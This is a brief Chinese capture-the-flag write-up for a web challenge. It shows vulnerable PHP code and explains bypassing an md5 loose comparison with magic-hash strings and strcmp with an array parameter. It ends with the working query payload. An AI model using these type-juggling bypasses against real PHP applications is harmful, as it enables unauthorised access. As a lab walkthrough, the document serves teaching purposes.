二十二、web24 前女友
F12看下源码,有一个指向cdoe.txt的链接
访问code.txt,得到如下代码:
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
if($v1 != $v2 && md5($v1) == md5($v2)){
if(!strcmp($v3, $flag)){
echo $flag;
}
}
}
?>
很明显 $v1
和$v2
是md5碰撞
if(!strcmp($v3, $flag)){
echo $flag;//$v3与$flag一样才会输出$flag
}
利用php弱类型中的一种——strcmp漏洞
我们传入一个数组就可以绕过了
因此构造:?v1=QNKCDZO&v2=s878926199a&v3[]=1